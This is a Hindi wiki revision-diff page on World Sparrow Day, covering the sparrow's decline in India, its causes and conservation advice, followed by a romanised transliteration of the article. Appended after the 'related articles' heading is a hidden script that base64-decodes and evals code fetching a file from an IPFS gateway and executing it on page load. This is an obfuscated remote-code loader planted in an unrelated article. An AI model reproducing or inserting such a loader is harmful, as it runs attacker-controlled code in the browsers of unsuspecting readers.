Difference between revisions of "विश्व गौरैया दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''विश्व गौरैया दिवस''' (''World Sparrow Day'') प्रत्येक वर्ष '[[20 मार...' के साथ नया पन्ना बनाया)
 
Line 3: Line 3:
 
'विश्व गौरैया दिवस' पहली बार [[वर्ष]] [[2010]] में मनाया गया था। यह दिवस प्रत्येक वर्ष [[20 मार्च]] को पूरी दुनिया में [[गौरैया|गौरैया पक्षी]] के संरक्षण के प्रति लोगों को जागरूक करने के लिए मनाया जाता है।  
 
'विश्व गौरैया दिवस' पहली बार [[वर्ष]] [[2010]] में मनाया गया था। यह दिवस प्रत्येक वर्ष [[20 मार्च]] को पूरी दुनिया में [[गौरैया|गौरैया पक्षी]] के संरक्षण के प्रति लोगों को जागरूक करने के लिए मनाया जाता है।  
 
====उद्देश्य====
 
====उद्देश्य====
एक-दो दशक पहले हमारे घर-आंगन में फुदकने वाली गौरैया आज विलुप्ति के कगार पर है। इस नन्हें से परिंदे को बचाने के लिए ही पिछले तीन सालों से प्रत्येक 20 मार्च को 'विश्व गौरैया दिवस' के रूप में मनाते आ रहे हैं, ताकि लोग इस नन्हीं-सी चिड़िया के संरक्षण के प्रति जागरूक हो सकें। [[भारत]] में गौरैया की संख्या लगातार घटती ही जा रही है। कुछ वर्षों पहले आसानी से दिख जाने वाला यह पक्षी अब तेज़ी से विलुप्त हो रहा है। [[दिल्ली]] में तो गौरैया इस कदर दुर्लभ हो गई है कि ढूंढे से भी ये पक्षी नहीं मिलता, इसलिए [[वर्ष]] [[2012]] में दिल्ली सरकार ने इसे राज्य-पक्षी घोषित कर दिया।<ref>{{cite web |url= http://gaureya.blogspot.in/2013/03/20-March-2013-World-Sparrow-day.html|title= विश्व गौरैया दिवस पर विशेष|accessmonthday= 25 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher= गौरैया|language= हिन्दी}}</ref>
+
एक-दो दशक पहले हमारे घर-आंगन में फुदकने वाली गौरैया आज विलुप्ति के कगार पर है। इस नन्हें से परिंदे को बचाने के लिए ही पिछले तीन सालों से प्रत्येक 20 मार्च को 'विश्व गौरैया दिवस' के रूप में मनाते आ रहे हैं, ताकि लोग इस नन्हीं-सी चिड़िया के संरक्षण के प्रति जागरूक हो सकें। [[भारत]] में गौरैया की संख्या लगातार घटती ही जा रही है। कुछ वर्षों पहले आसानी से दिख जाने वाला यह पक्षी अब तेज़ी से विलुप्त हो रहा है। [[दिल्ली]] में तो गौरैया इस कदर दुर्लभ हो गई है कि ढूंढे से भी ये पक्षी नहीं मिलता, इसलिए [[वर्ष]] [[2012]] में दिल्ली सरकार ने इसे राज्य-पक्षी घोषित कर दिया।<ref>{{cite web |url= http://gaureya.blogspot.in/2013/03/20-March-2013-World-Sparrow-day.html|title= विश्व गौरैया दिवस पर विशेष|accessmonthday= 25 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher= गौरैया|language= गौरैया}}</ref>
 +
==संकटग्रस्त पक्षी 'गौरैया'==
 +
पहले यह चिड़िया जब अपने बच्चों को चुग्गा खिलाया करती थी तो इंसानी बच्चे इसे बड़े कौतूहल से देखते थे, लेकिन अब तो इसके दर्शन भी मुश्किल हो गए हैं और यह विलुप्त हो रही प्रजातियों की सूची में आ गई है। पक्षी विज्ञानी हेमंत सिंह के अनुसार [[गौरैया]] की आबादी में 60 से 80 फीसदी तक की कमी आई है। यदि इसके संरक्षण के उचित प्रयास नहीं किए गए तो हो सकता है कि गौरैया [[इतिहास]] का प्राणी बन जाए और भविष्य की पीढ़ियों को यह देखने को ही न मिले। [[ब्रिटेन]] की ‘रॉयल सोसायटी ऑफ़ प्रोटेक्शन ऑफ़ बर्डस’ ने [[भारत]] से लेकर विश्व के विभिन्न हिस्सों में अनुसंधानकर्ताओं द्वारा किए गए अध्ययनों के आधार पर गौरैया को ‘रेड लिस्ट’ में डाला है।<ref name="aa">{{cite web |url= http://hindi.webdunia.com/forest-tourism/%E0%A4%97%E0%A5%8C%E0%A4%B0%E0%A5%88%E0%A4%AF%E0%A4%BE-%E0%A4%B5%E0%A4%BF%E0%A4%B2%E0%A5%81%E0%A4%AA%E0%A5%8D%E0%A4%A4-%E0%A4%AA%E0%A5%8D%E0%A4%B0%E0%A4%9C%E0%A4%BE%E0%A4%A4%E0%A4%BF%E0%A4%AF%E0%A5%8B%E0%A4%82-%E0%A4%95%E0%A5%80-%E0%A4%B8%E0%A5%82%E0%A4%9A%E0%A5%80-%E0%A4%AE%E0%A5%87%E0%A4%82-112032000133_1.htm|title= गौरैया:विलुप्त प्रजातियों की सूची में|accessmonthday= 25 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher=वेबदुनिया|language= हिन्दी}}</ref>
  
 +
'आंध्र विश्वविद्यालय' द्वारा किए गए अध्ययन के मुताबिक गौरैया की आबादी में करीब 60 फीसदी की कमी आई है। यह ह्रास ग्रामीण और शहरी, दोनों ही क्षेत्रों में हुआ है। पश्चिमी देशों में हुए अध्ययनों के अनुसार गौरैया की आबादी घटकर खतरनाक स्तर तक पहुंच गई है। गौरैया पर मंडरा रहे खतरे के कारण ही सुप्रसिद्ध पर्यावरणविद मोहम्मद ई दिलावर जैसे लोगों के प्रयासों से आज दुनिया भर में [[20 मार्च]] को 'विश्व गौरैया दिवस' मानाया जाता है, ताकि लोग इस पक्षी के संरक्षण के प्रति जागरूक हो सकें। दिलावर द्वारा शुरू की गई पहल पर ही आज बहुत से लोग गौरैया बचाने की कोशिशों में जुट रहे हैं।
 +
==घटती संख्या के कारण==
 +
[[गौरैया]] की घटती संख्या के कुछ मुख्य कारण निम्नलिखित हैं-
 +
#भोजन और [[जल]] की कमी
 +
#घोसलों के लिए उचित स्थानों की कमी
 +
#तेज़ी से कटते पेड़-पौधे
 +
#गौरैया के बच्चों का भोजन शुरूआती दस-पन्द्रह दिनों में सिर्फ कीड़े-मकोड़े ही होते है, लेकिन आजकल लोग खेतों से लेकर अपने गमले के पेड़-पौधों में भी रासायनिक पदार्थों का उपयोग करते हैं, जिससे ना तो पौधों को कीड़े लगते हैं और ना ही इस पक्षी का समुचित भोजन पनप पाता है। इसलिए गौरैया समेत दुनिया भर के हज़ारों पक्षी आज या तो विलुप्त हो चुके हैं या फिर किसी कोने में अपनी अन्तिम सांसे गिन रहे हैं।<ref>{{cite web |url= http://gaureya.blogspot.in/2014/03/World-Sparrow-day-or-Vishv-Gauraiya-Divas.html|title=विश्व गौरैया दिवस|accessmonthday= 25 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher= गौरैया|language= गौरैया}}</ref>
 +
#आवासीय ह्रास, अनाज में कीटनाशकों के इस्तेमाल, आहार की कमी और मोबाइल फोन तथा मोबाइल टॉवरों से निकलने वाली सूक्ष्म तरंगें गौरैया के अस्तित्व के लिए खतरा बन रही हैं।
 +
#आज लोगों में गौरैया को लेकर जागरूकता पैदा किए जाने की जरूरत है, क्योंकि कई बार लोग अपने घरों में इस पक्षी के घोंसले को बसने से पहले ही उजाड़ देते हैं।
 +
#कई बार बच्चे इन्हें पकड़कर पहचान के लिए इनके पैर में धागा बांधकर इन्हें छोड़ देते हैं। इससे कई बार किसी पेड़ की टहनी या शाखाओं में अटक कर इस पक्षी की जान चली जाती है। इतना ही नहीं कई बार बच्चे गौरैया को पकड़कर इसके पंखों को [[रंग]] देते हैं, जिससे उसे उड़ने में दिक्कत होती है और उसके स्वास्थ्य पर भी विपरीत असर पड़ता है।<ref name="aa"/>
 +
==पक्षी विज्ञानियों की सलाह==
 +
पक्षी विज्ञानियों के अनुसार [[गौरैया]] को फिर से बुलाने के लिए लोगों को अपने घरों में कुछ ऐसे स्थान उपलब्ध कराने चाहिए, जहां वे आसानी से अपने घोंसले बना सकें और उनके अंडे तथा बच्चे हमलावर पक्षियों से सुरक्षित रह सकें। वैज्ञानिकों का मानना है कि गौरैया की आबादी में ह्रास का एक बड़ा कारण यह भी है कि कई बार उनके घोंसले सुरक्षित जगहों पर न होने के कारण कौए जैसे हमलावर पक्षी उनके अंडों तथा बच्चों को खा जाते हैं।
 +
 +
गौरैया आजकल अपने अस्तित्व के लिए मनुष्यों और अपने आसपास के वातावरण से काफ़ी जद्दोजहद कर रही है। ऐसे समय में हमें इन पक्षियों के लिए वातावरण को इनके प्रति अनुकूल बनाने में सहायता प्रदान करनी चाहिए। तभी ये हमारे बीच चह चहायेंगे। मनुष्यों को गौरैया के लिए कुछ ना कुछ तो करना ही होगा, वरना यह भी मॉरीशस के 'डोडो' पक्षी और गिद्ध की तरह पूरी तरह से विलुप्त हो जायेंगे। इसलिए सभी को मिलकर [[गौरैया]] का संरक्षण करना होगा।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 10:50, 25 January 2015

vishv gauraiya divas (World Sparrow Day) pratyek varsh '20 march' ko manaya jata hai. yah divas poori duniya mean gauraiya pakshi ke sanrakshan ke prati logoan ko jagarook karane ke lie manaya jata hai. gharoan ko apani chian-chian se chahakane vali gauraiya ab dikhaee nahian deti. is chhote akar vale khoobasoorat pakshi ka kabhi iansan ke gharoan mean basera hua karata tha aur bachche bachapan se ise dekhate b de hua karate the. ab sthiti badal gee hai. gauraiya ke astitv par chhae sankat ke badaloan ne isaki sankhya kafi kam kar di hai aur kahian-kahian to ab yah bilkul dikhaee nahian deti.

shuruat

'vishv gauraiya divas' pahali bar varsh 2010 mean manaya gaya tha. yah divas pratyek varsh 20 march ko poori duniya mean gauraiya pakshi ke sanrakshan ke prati logoan ko jagarook karane ke lie manaya jata hai.

uddeshy

ek-do dashak pahale hamare ghar-aangan mean phudakane vali gauraiya aj vilupti ke kagar par hai. is nanhean se pariande ko bachane ke lie hi pichhale tin saloan se pratyek 20 march ko 'vishv gauraiya divas' ke roop mean manate a rahe haian, taki log is nanhian-si chi diya ke sanrakshan ke prati jagarook ho sakean. bharat mean gauraiya ki sankhya lagatar ghatati hi ja rahi hai. kuchh varshoan pahale asani se dikh jane vala yah pakshi ab tezi se vilupt ho raha hai. dilli mean to gauraiya is kadar durlabh ho gee hai ki dhooandhe se bhi ye pakshi nahian milata, isalie varsh 2012 mean dilli sarakar ne ise rajy-pakshi ghoshit kar diya.[1]

sankatagrast pakshi 'gauraiya'

pahale yah chi diya jab apane bachchoan ko chugga khilaya karati thi to iansani bachche ise b de kautoohal se dekhate the, lekin ab to isake darshan bhi mushkil ho ge haian aur yah vilupt ho rahi prajatiyoan ki soochi mean a gee hai. pakshi vijnani hemant sianh ke anusar gauraiya ki abadi mean 60 se 80 phisadi tak ki kami aee hai. yadi isake sanrakshan ke uchit prayas nahian kie ge to ho sakata hai ki gauraiya itihas ka prani ban jae aur bhavishy ki pidhiyoan ko yah dekhane ko hi n mile. briten ki ‘r aauyal sosayati aauf protekshan aauf bardas’ ne bharat se lekar vishv ke vibhinn hissoan mean anusandhanakartaoan dvara kie ge adhyayanoan ke adhar par gauraiya ko ‘red list’ mean dala hai.[2]

'aandhr vishvavidyalay' dvara kie ge adhyayan ke mutabik gauraiya ki abadi mean karib 60 phisadi ki kami aee hai. yah hras gramin aur shahari, donoan hi kshetroan mean hua hai. pashchimi deshoan mean hue adhyayanoan ke anusar gauraiya ki abadi ghatakar khataranak star tak pahuanch gee hai. gauraiya par mandara rahe khatare ke karan hi suprasiddh paryavaranavid mohammad ee dilavar jaise logoan ke prayasoan se aj duniya bhar mean 20 march ko 'vishv gauraiya divas' manaya jata hai, taki log is pakshi ke sanrakshan ke prati jagarook ho sakean. dilavar dvara shuroo ki gee pahal par hi aj bahut se log gauraiya bachane ki koshishoan mean jut rahe haian.

ghatati sankhya ke karan

gauraiya ki ghatati sankhya ke kuchh mukhy karan nimnalikhit haian-

  1. bhojan aur jal ki kami
  2. ghosaloan ke lie uchit sthanoan ki kami
  3. tezi se katate pe d-paudhe
  4. gauraiya ke bachchoan ka bhojan shurooati das-pandrah dinoan mean sirph ki de-mako de hi hote hai, lekin ajakal log khetoan se lekar apane gamale ke pe d-paudhoan mean bhi rasayanik padarthoan ka upayog karate haian, jisase na to paudhoan ko ki de lagate haian aur na hi is pakshi ka samuchit bhojan panap pata hai. isalie gauraiya samet duniya bhar ke hazaroan pakshi aj ya to vilupt ho chuke haian ya phir kisi kone mean apani antim saanse gin rahe haian.[3]
  5. avasiy hras, anaj mean kitanashakoan ke istemal, ahar ki kami aur mobail phon tatha mobail t aauvaroan se nikalane vali sookshm tarangean gauraiya ke astitv ke lie khatara ban rahi haian.
  6. aj logoan mean gauraiya ko lekar jagarookata paida kie jane ki jaroorat hai, kyoanki kee bar log apane gharoan mean is pakshi ke ghoansale ko basane se pahale hi uja d dete haian.
  7. kee bar bachche inhean pak dakar pahachan ke lie inake pair mean dhaga baandhakar inhean chho d dete haian. isase kee bar kisi pe d ki tahani ya shakhaoan mean atak kar is pakshi ki jan chali jati hai. itana hi nahian kee bar bachche gauraiya ko pak dakar isake pankhoan ko rang dete haian, jisase use u dane mean dikkat hoti hai aur usake svasthy par bhi viparit asar p data hai.[2]

pakshi vijnaniyoan ki salah

pakshi vijnaniyoan ke anusar gauraiya ko phir se bulane ke lie logoan ko apane gharoan mean kuchh aise sthan upalabdh karane chahie, jahaan ve asani se apane ghoansale bana sakean aur unake aande tatha bachche hamalavar pakshiyoan se surakshit rah sakean. vaijnanikoan ka manana hai ki gauraiya ki abadi mean hras ka ek b da karan yah bhi hai ki kee bar unake ghoansale surakshit jagahoan par n hone ke karan kaue jaise hamalavar pakshi unake aandoan tatha bachchoan ko kha jate haian.

gauraiya ajakal apane astitv ke lie manushyoan aur apane asapas ke vatavaran se kafi jaddojahad kar rahi hai. aise samay mean hamean in pakshiyoan ke lie vatavaran ko inake prati anukool banane mean sahayata pradan karani chahie. tabhi ye hamare bich chah chahayeange. manushyoan ko gauraiya ke lie kuchh na kuchh to karana hi hoga, varana yah bhi m aaurishas ke 'dodo' pakshi aur giddh ki tarah poori tarah se vilupt ho jayeange. isalie sabhi ko milakar gauraiya ka sanrakshan karana hoga.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. vishv gauraiya divas par vishesh (gauraiya) gauraiya. abhigaman tithi: 25 janavari, 2015.
  2. 2.0 2.1 gauraiya:vilupt prajatiyoan ki soochi mean (hindi) vebaduniya. abhigaman tithi: 25 janavari, 2015.
  3. vishv gauraiya divas (gauraiya) gauraiya. abhigaman tithi: 25 janavari, 2015.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>